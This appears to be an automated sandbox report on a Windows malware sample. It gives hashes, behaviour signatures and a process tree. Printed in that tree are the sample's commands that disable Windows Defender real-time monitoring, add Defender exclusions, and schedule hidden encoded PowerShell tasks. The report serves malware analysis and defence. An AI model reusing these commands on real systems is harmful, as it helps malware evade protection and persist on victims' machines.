Analysis

  • max time kernel
    223s
  • max time network
    230s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/07/2024, 05:03 UTC

General

  • Target

    7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe

  • Size

    7.3MB

  • MD5

    ad7f2a7bfc3a95fef273ace9a215c988

  • SHA1

    5044a0cc66519fdcfbfbf232954c27e2527d29c6

  • SHA256

    7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56

  • SHA512

    66cceedb92d3b5b38005c0016900dfaf9e40b4a0ea66bf617355e20e8084214d2f1d31ebe68bac74b898209dfccd5669afd245494c30d4ddd18c3bae1667cc1d

  • SSDEEP

    196608:91O5X2jQimknPT+pXYzohYye6NDw2yBtJHl:3O5XlZUPS68mye2DXyvJHl

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe
    "C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Users\Admin\AppData\Local\Temp\7zS41D1.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Users\Admin\AppData\Local\Temp\7zS4441.tmp\Install.exe
        .\Install.exe /BdidFTzS "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2628
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1660
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe\" om /UdidBEQ 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 604
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1672
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {DFB8EB59-A1DB-4ED2-A43E-1197300EBB0B} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe
      C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe om /UdidBEQ 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gddbOEtKo" /SC once /ST 04:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:352
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gddbOEtKo"
        3⤵
        PID:1116
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gddbOEtKo"
        3⤵
        PID:2452
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        3⤵
        PID:940
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:1548
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        3⤵
        PID:1420
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:1704
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gWIwmfRNP" /SC once /ST 04:18:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2592
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gWIwmfRNP"
        3⤵
        PID:1948
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gWIwmfRNP"
        3⤵
        PID:1620
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
        3⤵
        PID:2320
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          4⤵
          PID:2700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2752
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:2916
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2576
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:2688
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2404
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:2560
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:548
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:840
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:3008
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C copy nul "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"
        3⤵
        PID:3000
      • C:\Windows\SysWOW64\wscript.exe
        wscript "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"
        3⤵
        • Modifies data under HKEY_USERS
        PID:2628
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2176
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1920
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2536
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2948
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2160
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2108
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2172
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1736
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2444
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1084
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:1748
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2860
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2020
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:848
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:1712
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2016
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2256
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:532
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:3052
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2164
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1288
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2580
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2500
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2380
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:836
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1996
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:692
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1680
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1284
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1068
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2132
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2528
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2516
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1008
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:704
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1728
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gJqcGvoOz" /SC once /ST 01:01:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1236
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gJqcGvoOz"
        3⤵
        PID:2600
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gJqcGvoOz"
        3⤵
        PID:344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        3⤵
        PID:1240
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
          4⤵
          PID:644
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        3⤵
        PID:1988
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
          4⤵
          PID:2632
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 01:57:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe\" 0O /NqUMdidsP 525403 /S" /V1 /F
        3⤵
        • Drops file in Windows directory
        • Scheduled Task/Job: Scheduled Task
        PID:2568
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "akamOyUwOLVWEybrw"
        3⤵
        PID:1060
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 328
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:1920
                                                                                    • C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe
                                                                                      C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe 0O /NqUMdidsP 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3060
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bYIjjyXTgczhZAJGMW"
                                                                                        3⤵
                                                                                          PID:2160
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1312
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:1656
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2800
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2056
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1412
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:2004
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2024
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2344
